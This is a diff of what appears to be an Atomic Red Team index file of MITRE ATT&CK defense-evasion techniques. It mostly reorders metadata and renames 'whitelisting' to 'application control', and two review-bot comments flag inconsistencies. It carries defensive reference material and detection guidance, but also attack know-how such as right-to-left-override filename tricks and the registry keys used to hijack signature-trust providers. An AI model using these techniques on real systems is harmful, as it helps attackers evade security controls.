+ x_mitre_is_subtechnique: true
x_mitre_permissions_required:
- User
- - Administrator
x_mitre_detection: Establish centralized logging of instance activity, which
can be used to monitor and review system events even after reverting to a
snapshot, rolling back changes, or changing persistence/type of storage. Monitor
@@ -29708,20 +30591,34 @@ defense-evasion:
is logged with the change (e.g., tag or header) if supported by the cloud
provider, to help distinguish valid, expected actions from malicious ones.
x_mitre_data_sources:
- - AWS CloudTrail logs
- - Azure activity logs
- Stackdriver logs
- x_mitre_version: '1.1'
+ - GCP audit logs
+ - Azure activity logs
+ - AWS CloudTrail logs
x_mitre_contributors:
- Netskope
x_mitre_platforms:
- AWS
- GCP
- Azure
- x_mitre_is_subtechnique: false
atomic_tests: []
T1036.002:
technique:
+ created: '2020-02-10T19:55:29.385Z'
+ modified: '2020-03-29T20:16:36.316Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
+ id: attack-pattern--77eae145-55db-4519-8ae5-77b0c7215d69
+ description: |-
+ Adversaries may use the right-to-left override (RTLO or RLO) character (U+202E) as a means of tricking a user into executing what they think is a benign file type but is actually executable code. RTLO is a non-printing character that causes the text that follows it to be displayed in reverse.(Citation: Infosecinstitute RTLO Technique) For example, a Windows screensaver executable named March 25 \u202Excod.scr will display as March 25 rcs.docx. A JavaScript file named photo_high_re\u202Egnp.js will be displayed as photo_high_resj.png.
+
+ A common use of this technique is with [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)/[Malicious File](https://attack.mitre.org/techniques/T1204/002) since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default.
+ name: Right-to-Left Override
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1036.002
@@ -29739,21 +30636,6 @@ defense-evasion:
description: Firsh, A.. (2018, February 13). Zero-day vulnerability in Telegram
- Cybercriminals exploited Telegram flaw to launch multipurpose attacks.
Retrieved April 22, 2019.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Right-to-Left Override
- description: |-
- Adversaries may use the right-to-left override (RTLO or RLO) character (U+202E) as a means of tricking a user into executing what they think is a benign file type but is actually executable code. RTLO is a non-printing character that causes the text that follows it to be displayed in reverse.(Citation: Infosecinstitute RTLO Technique) For example, a Windows screensaver executable named March 25 \u202Excod.scr will display as March 25 rcs.docx. A JavaScript file named photo_high_re\u202Egnp.js will be displayed as photo_high_resj.png.
-
- A common use of this technique is with [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)/[Malicious File](https://attack.mitre.org/techniques/T1204/002) since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default.
- id: attack-pattern--77eae145-55db-4519-8ae5-77b0c7215d69
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-03-29T20:16:36.316Z'
- created: '2020-02-10T19:55:29.385Z'
x_mitre_platforms:
- Linux
- macOS
@@ -29811,16 +30693,11 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-19T21:04:12.164Z'
created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '2.0'
- x_mitre_contributors:
- - Vincent Le Toux
- x_mitre_data_sources:
- - API monitoring
- - Authentication logs
- - Network protocol analysis
- - Packet capture
- x_mitre_defense_bypassed:
- - Log analysis
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_detection: |-
Monitor and analyze network traffic associated with data replication (such as calls to DrsAddEntry, DrsReplicaAdd, and especially GetNCChanges) between DCs as well as to/from non DC hosts. (Citation: GitHub DCSYNCMonitor) (Citation: DCShadow Blog) DC replication will naturally take place every 15 minutes but can be triggered by an attacker or by legitimate urgent changes (ex: passwords). Also consider monitoring and alerting on the replication of AD objects (Audit Detailed Directory Service Replication Events 4928 and 4929). (Citation: DCShadow Blog)
@@ -29829,11 +30706,16 @@ defense-evasion:
Baseline and periodically analyze the Configuration partition of the AD schema and alert on creation of nTDSDSA objects. (Citation: DCShadow Blog)
Investigate usage of Kerberos Service Principal Names (SPNs), especially those associated with services (beginning with “GC/”) by computers not present in the DC organizational unit (OU). The SPN associated with the Directory Replication Service (DRS) Remote Protocol interface (GUID E3514235–4B06–11D1-AB04–00C04FC2DCD2) can be set without logging. (Citation: ADDSecurity DCShadow Feb 2018) A rogue DC must authenticate as a service using these two SPNs for the replication process to successfully complete.
- x_mitre_permissions_required:
- - Administrator
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_defense_bypassed:
+ - Log analysis
+ x_mitre_data_sources:
+ - API monitoring
+ - Authentication logs
+ - Network protocol analysis
+ - Packet capture
+ x_mitre_contributors:
+ - Vincent Le Toux
+ x_mitre_version: '2.0'
identifier: T1207
atomic_tests:
- name: DCShadow - Mimikatz
@@ -29895,35 +30777,35 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T23:30:21.364Z'
+ modified: '2020-06-20T22:29:55.496Z'
created: '2017-05-31T21:30:26.496Z'
- x_mitre_version: '1.1'
- x_mitre_data_sources:
- - BIOS
- - MBR
- - System calls
- x_mitre_defense_bypassed:
- - File monitoring
- - Host intrusion prevention systems
- - Process whitelisting
- - Signature-based detection
- - System access controls
- - Whitelisting by file name or path
- - Anti-virus
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ - root
x_mitre_detection: 'Some rootkit protections may be built into anti-virus or
operating system software. There are dedicated rootkit detection tools that
look for specific types of rootkit behavior. Monitor for the existence of
unrecognized DLLs, devices, services, and changes to the MBR. (Citation: Wikipedia
Rootkit)'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_defense_bypassed:
+ - File monitoring
+ - Host intrusion prevention systems
+ - Application control
+ - Signature-based detection
+ - System access controls
+ - Application control by file name or path
+ - Anti-virus
+ x_mitre_data_sources:
+ - BIOS
+ - MBR
+ - System calls
+ x_mitre_version: '1.1'
identifier: T1014
atomic_tests:
- name: Loadable Kernel Module based Rootkit
@@ -30038,11 +30920,74 @@ defense-evasion:
'
name: command_prompt
+ T1564.006:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1564.006
+ url: https://attack.mitre.org/techniques/T1564/006
+ - source_name: SingHealth Breach Jan 2019
+ url: https://www.mci.gov.sg/-/media/mcicorp/doc/report-of-the-coi-into-the-cyber-attack-on-singhealth-10-jan-2019.ashx
+ description: Committee of Inquiry into the Cyber Attack on SingHealth. (2019,
+ January 10). Public Report of the Committee of Inquiry into the Cyber Attack
+ on Singapore Health Services Private Limited's Patient Database. Retrieved
+ June 29, 2020.
+ - source_name: Sophos Ragnar May 2020
+ url: https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/
+ description: SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys
+ virtual machine to dodge security. Retrieved June 29, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Run Virtual Instance
+ description: |-
+ Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)
+
+ Adversaries may utilize native support for virtualization (ex: Hyper-V) or drop the necessary files to run a virtual instance (ex: VirtualBox binaries). After running a virtual instance, adversaries may create a shared folder between the guest and host with permissions that enable the virtual instance to interact with the host file system.(Citation: Sophos Ragnar May 2020)
+ id: attack-pattern--b5327dd1-6bf9-4785-a199-25bcbd1f4a9d
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-07-06T19:03:40.330Z'
+ created: '2020-06-29T15:36:41.535Z'
+ x_mitre_detection: "Consider monitoring for files and processes associated with
+ running a virtual instance, such as binary files associated with common virtualization
+ technologies (ex: VirtualBox, VMware, QEMU, Hyper-V). Consider monitoring
+ for process command-line arguments that may be atypical for benign use of
+ virtualization software. Usage of virtualization binaries or command-line
+ arguments associated with running a headless (in the background with no UI)
+ virtual instance may be especially suspect. Network adapter information may
+ also be helpful in detecting the use of virtual instances.\n\nIf virtualization
+ software is installed by the adversary, the Registry may provide detection
+ opportunities. Consider monitoring for [Windows Service](https://attack.mitre.org/techniques/T1543/003),
+ with respect to virtualization software. \n\nBenign usage of virtualization
+ technology is common in enterprise environments, data and events should not
+ be viewed in isolation, but as part of a chain of behavior."
+ x_mitre_contributors:
+ - Janantha Marasinghe
+ - Menachem Shafran, XM Cyber
+ x_mitre_data_sources:
+ - Packet capture
+ - Host network interface
+ - Windows Registry
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ atomic_tests: []
T1218.011:
technique:
id: attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5
description: |-
- Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
+ Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Rundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)
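Review bot: The rundll32 description at the end of this hunk replaces `whitelists` with `allowlists`, whereas every other renamed value in this commit (`x_mitre_defense_bypassed` entries in the T1014, T1218.011, T1553.003, T1218 and T1216 hunks) uses `Application control`, and the T1064 hunk below keeps `- Process whitelisting` untouched under `x_mitre_defense_bypassed`. These are presumably copied verbatim from the upstream ATT&CK objects (T1064 is marked `x_mitre_deprecated: true` with an unchanged `modified` timestamp), so they may not be editable here, but a consumer that filters or searches on the `Application control` string will miss both. If the generator cannot normalise them, a line in the commit description such as `deprecated techniques and free-text descriptions keep upstream wording` would save the next reviewer the same check. The T1218.011 mapping continues past the end of this hunk.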
@@ -30067,32 +31012,32 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T15:34:07.002Z'
+ modified: '2020-06-20T22:31:42.113Z'
created: '2020-01-23T18:03:46.248Z'
- x_mitre_contributors:
- - Casey Smith
- - Ricardo Dias
- x_mitre_data_sources:
- - DLL monitoring
- - Loaded DLLs
- - Process command-line parameters
- - Process monitoring
- x_mitre_defense_bypassed:
- - Digital Certificate Validation
- - Application whitelisting
- - Anti-virus
- x_mitre_permissions_required:
- - User
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
x_mitre_detection: Use process monitoring to monitor the execution and arguments
of rundll32.exe. Compare recent invocations of rundll32.exe with prior history
of known good arguments and loaded DLLs to determine anomalous and potentially
adversarial activity. Command arguments used with the rundll32.exe invocation
may also be useful in determining the origin and purpose of the DLL being
loaded.
- x_mitre_platforms:
- - Windows
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_permissions_required:
+ - User
+ x_mitre_defense_bypassed:
+ - Digital Certificate Validation
+ - Application control
+ - Anti-virus
+ x_mitre_data_sources:
+ - DLL monitoring
+ - Loaded DLLs
+ - Process command-line parameters
+ - Process monitoring
+ x_mitre_contributors:
+ - Casey Smith
+ - Ricardo Dias
identifier: T1218.011
atomic_tests:
- name: Rundll32 execute JavaScript Remote Payload With GetObject
@@ -30281,24 +31226,24 @@ defense-evasion:
phase_name: privilege-escalation
modified: '2020-03-26T21:49:31.964Z'
created: '2020-02-18T18:34:49.414Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - Windows event logs
- - Authentication logs
- - API monitoring
+ x_mitre_contributors:
+ - Alain Homewood, Insomnia Security
+ - Vincent Le Toux
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
x_mitre_detection: |-
Examine data in user’s SID-History attributes using the PowerShell Get-ADUser cmdlet (Citation: Microsoft Get-ADUser), especially users who have SID-History values from the same domain. (Citation: AdSecurity SID History Sept 2015) Also monitor account management events on Domain Controllers for successful and failed changes to SID-History. (Citation: AdSecurity SID History Sept 2015) (Citation: Microsoft DsAddSidHistory)
Monitor for Windows API calls to the DsAddSidHistory function. (Citation: Microsoft DsAddSidHistory)
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Alain Homewood, Insomnia Security
- - Vincent Le Toux
+ x_mitre_data_sources:
+ - Windows event logs
+ - Authentication logs
+ - API monitoring
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1553.003:
technique:
@@ -30347,11 +31292,11 @@ defense-evasion:
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: SIP and Trust Provider Hijacking
description: |-
- Adversaries may tamper with SIP and trust provider components to mislead the operating system and application whitelisting tools when conducting signature validation checks. In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)
+ Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)
Because of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)
- Similar to [Code Signing](https://attack.mitre.org/techniques/T1116), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and whitelisting tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)
+ Similar to [Code Signing](https://attack.mitre.org/techniques/T1116), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)
* Modifying the Dll and FuncName Registry values in HKLM\SOFTWARE[\WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{SIP_GUID} that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).
* Modifying the Dll and FuncName Registry values in HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{SIP_GUID} that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.
@@ -30364,21 +31309,18 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-27T13:19:38.506Z'
+ modified: '2020-06-20T22:42:26.022Z'
created: '2020-02-05T19:34:04.910Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Matt Graeber, @mattifestation, SpecterOps
- x_mitre_data_sources:
- - Windows Registry
- - API monitoring
- - Application logs
- - DLL monitoring
- - Loaded DLLs
- - Process monitoring
- - Windows Registry
- - Windows event logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - SYSTEM
+ - Administrator
+ x_mitre_defense_bypassed:
+ - Application control
+ - Autoruns Analysis
+ - Digital Certificate Validation
+ - User Mode Signature Validation
x_mitre_detection: |-
Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries. (Citation: SpectorOps Subverting Trust Sept 2017)
@@ -30394,17 +31336,19 @@ defense-evasion:
**Note:** As part of this technique, adversaries may attempt to manually edit these Registry keys (ex: Regedit) or utilize the legitimate registration process using [Regsvr32](https://attack.mitre.org/techniques/T1117). (Citation: SpectorOps Subverting Trust Sept 2017)
Analyze Autoruns data for oddities and anomalies, specifically malicious files attempting persistent execution by hiding within auto-starting locations. Autoruns will hide entries signed by Microsoft or Windows by default, so ensure “Hide Microsoft Entries” and “Hide Windows Entries” are both deselected. (Citation: SpectorOps Subverting Trust Sept 2017)
- x_mitre_defense_bypassed:
- - Application whitelisting
- - Autoruns Analysis
- - Digital Certificate Validation
- - Process whitelisting
- - User Mode Signature Validation
- x_mitre_permissions_required:
- - SYSTEM
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Windows Registry
+ - API monitoring
+ - Application logs
+ - DLL monitoring
+ - Loaded DLLs
+ - Process monitoring
+ - Windows Registry
+ - Windows event logs
+ x_mitre_contributors:
+ - Matt Graeber, @mattifestation, SpecterOps
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1064:
technique:
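Review bot: The new-side `x_mitre_data_sources` list for T1553.003 in this hunk contains `- Windows Registry` twice (first and seventh entries). The duplicate was already present before the reorder, but it survives it, and any consumer that counts or joins data sources will see the repeated value. If the entry mirrors the upstream ATT&CK object the fix belongs in the generator or upstream rather than a hand edit here; otherwise drop the second `- Windows Registry`. The T1553.003 mapping begins several hunks earlier and only its tail is visible in this hunk.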
@@ -30451,29 +31395,29 @@ defense-evasion:
phase_name: execution
modified: '2020-03-30T13:39:24.852Z'
created: '2017-05-31T21:30:51.733Z'
- x_mitre_deprecated: true
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - Process monitoring
- - File monitoring
- - Process command-line parameters
- x_mitre_defense_bypassed:
- - Process whitelisting
- - Data Execution Prevention
- - Exploit Prevention
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: |-
Scripting may be common on admin, developer, or power user systems, depending on job function. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.
Analyze Office file attachments for potentially malicious macros. Execution of macros may create suspicious process trees depending on what the macro is designed to do. Office processes, such as winword.exe, spawning instances of cmd.exe, script application like wscript.exe or powershell.exe, or other suspicious processes may indicate malicious activity. (Citation: Uperesia Malicious Office Documents)
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_defense_bypassed:
+ - Process whitelisting
+ - Data Execution Prevention
+ - Exploit Prevention
+ x_mitre_data_sources:
+ - Process monitoring
+ - File monitoring
+ - Process command-line parameters
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_deprecated: true
atomic_tests: []
T1574.010:
technique:
@@ -30503,8 +31447,22 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-26T19:37:28.912Z'
created: '2020-03-12T20:43:53.998Z'
- x_mitre_platforms:
- - Windows
+ x_mitre_contributors:
+ - Travis Smith, Tripwire
+ - Stefan Kanthak
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Services
+ - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_effective_permissions:
+ - SYSTEM
+ - Administrator
+ - User
+ x_mitre_permissions_required:
+ - Administrator
+ - User
x_mitre_detection: "Look for changes to binaries and service executables that
may normally occur during software updates. If an executable is written, renamed,
and/or moved to match an existing service executable, it could be detected
@@ -30513,22 +31471,8 @@ defense-evasion:
for abnormal process call trees from typical processes and services and for
execution of other commands that could relate to Discovery or other adversary
techniques. "
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_effective_permissions:
- - SYSTEM
- - Administrator
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - Process command-line parameters
- - Services
- - File monitoring
- x_mitre_contributors:
- - Travis Smith, Tripwire
- - Stefan Kanthak
+ x_mitre_platforms:
+ - Windows
identifier: T1574.010
atomic_tests:
- name: File System Permissions Weakness
@@ -30633,32 +31577,32 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-26T19:43:33.981Z'
+ modified: '2020-06-20T22:01:09.906Z'
created: '2020-03-13T11:42:14.444Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Travis Smith, Tripwire
- - Matthew Demaske, Adaptforward
- x_mitre_data_sources:
- - Windows Registry
- - Services
- - Process command-line parameters
+ x_mitre_defense_bypassed:
+ - Application control
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_effective_permissions:
+ - SYSTEM
+ x_mitre_permissions_required:
+ - Administrator
+ - User
x_mitre_detection: |-
Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Look for changes to services that do not correlate with known software, patch cycles, etc. Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.
Monitor processes and command-line arguments for actions that could be done to modify services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be changed through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_effective_permissions:
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_defense_bypassed:
- - Process whitelisting
+ x_mitre_data_sources:
+ - Windows Registry
+ - Services
+ - Process command-line parameters
+ x_mitre_contributors:
+ - Travis Smith, Tripwire
+ - Matthew Demaske, Adaptforward
+ x_mitre_platforms:
+ - Windows
identifier: T1574.011
atomic_tests:
- name: Service Registry Permissions Weakness
@@ -30711,20 +31655,20 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-27T00:43:58.149Z'
created: '2020-01-30T14:11:41.212Z'
- x_mitre_platforms:
- - Linux
- - macOS
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: Monitor the file system for files that have the setuid or
+ setgid bits set. Monitor for execution of utilities, like chmod, and their
+ command-line arguments to look for setuid or setguid bits being set.
x_mitre_data_sources:
- File monitoring
- Process monitoring
- Process command-line parameters
- x_mitre_detection: Monitor the file system for files that have the setuid or
- setgid bits set. Monitor for execution of utilities, like chmod, and their
- command-line arguments to look for setuid or setguid bits being set.
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Linux
+ - macOS
identifier: T1548.001
atomic_tests:
- name: Make and modify binary from C source
@@ -30820,9 +31764,26 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T17:19:19.724Z'
+ modified: '2020-06-20T22:39:02.045Z'
created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '2.1'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_detection: |-
+ Monitor processes and command-line parameters for signed binaries that may be used to proxy execution of malicious files. Compare recent invocations of signed binaries that may be used to proxy execution with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Legitimate programs used in suspicious ways, like msiexec.exe downloading an MSI file from the Internet, may be indicative of an intrusion. Correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.
+
+ Monitor for file activity (creations, downloads, modifications, etc.), especially for file types that are not typical within an environment and may be indicative of adversary activity.
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Application control
+ - Digital Certificate Validation
+ x_mitre_contributors:
+ - Nishan Maharjan, @loki248
+ - Hans Christoffer Gaardløs
+ - Praetorian
x_mitre_data_sources:
- API monitoring
- File monitoring
@@ -30833,25 +31794,7 @@ defense-evasion:
- DLL monitoring
- Process monitoring
- Process command-line parameters
- x_mitre_contributors:
- - Nishan Maharjan, @loki248
- - Hans Christoffer Gaardløs
- - Praetorian
- x_mitre_defense_bypassed:
- - Anti-virus
- - Process whitelisting
- - Application whitelisting
- - Digital Certificate Validation
- x_mitre_detection: |-
- Monitor processes and command-line parameters for signed binaries that may be used to proxy execution of malicious files. Compare recent invocations of signed binaries that may be used to proxy execution with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Legitimate programs used in suspicious ways, like msiexec.exe downloading an MSI file from the Internet, may be indicative of an intrusion. Correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.
-
- Monitor for file activity (creations, downloads, modifications, etc.), especially for file types that are not typical within an environment and may be indicative of adversary activity.
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_version: '2.1'
identifier: T1218
atomic_tests:
- name: mavinject - Inject DLL into running process
@@ -30961,7 +31904,7 @@ defense-evasion:
proxy execution of malicious files. Several Microsoft signed scripts that
are default on Windows installations can be used to proxy execution of other
files. This behavior may be abused by adversaries to execute malicious files
- that could bypass application whitelisting and signature validation on systems.(Citation:
+ that could bypass application control and signature validation on systems.(Citation:
GitHub Ultimate AppLocker Bypass List)'
external_references:
- source_name: mitre-attack
@@ -30977,25 +31920,25 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T19:39:37.336Z'
+ modified: '2020-06-20T22:39:47.559Z'
created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '1.1'
- x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
- x_mitre_contributors:
- - Praetorian
- x_mitre_defense_bypassed:
- - Application whitelisting
- - Digital Certificate Validation
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_permissions_required:
+ - User
